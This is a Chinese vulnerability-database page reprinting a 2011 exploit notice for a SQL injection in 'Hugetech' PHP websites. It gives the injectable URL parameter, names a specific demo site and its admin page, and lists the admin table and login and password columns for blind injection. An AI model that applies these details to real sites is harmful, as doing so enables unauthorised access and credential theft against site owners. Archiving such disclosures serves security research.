Hugetech SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1048875 漏洞类型
发布时间 2011-08-10 更新时间 2011-08-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2011080062
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|*		 ______  ____     __  __     			                      |
|*		/\__  _\/\  _`\  /\ \/\ \       	                          |
|*		\/_/\ \/\ \ \L\ \\ \ \_\ \      	 { Turki$ hackers }       |
|*		   \ \ \ \ \  _ <'\ \  _  \   		                          |
|*		    \ \ \ \ \ \L\ \\ \ \ \ \                                  |
|*		     \ \_\ \ \____/ \ \_\ \_\			                      |
|*		      \/_/  \/___/   \/_/\/_/		                          |
|*				                                    				  |
|*								 								      |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title]	        :[ Hugetech sql injection vulnerability]        /*
\* [Author]	        :[skote_vahshat]                                 /*
\* [Home]	        :[Http://Skote-Vahshat.com]                      /*
\* [Archive]	    :[Http://xpl.skote-vahshat.com]                  /*
\* [Email] 	        :[skote.vahshat@Gmail.Com]                       /* 
=======================================================================
/* Web Server: Microsoft-IIS/6.0
/* Powered-by: ASP.NET
/*Powered-by: PHP/5.2.4
/* [+]Exploit :
/*              http://www.target.com/en/pread.php?id=[SQLi]
/* [+]Demo:
/*         http://www.asaxssd.com/en/pread.php?id=21[SQLi]
/* [+]admin page 
/*		   http://www.asaxssd.com/en/manager/
/* [+] talbe admin  (login)
/* [+] column ( loginname , loginpwd)
/*  blind Sql injection   
=======================================================================
|_***_| spical thanks : bl4ck.viper 				 all turkiS hackers|
=======================================================================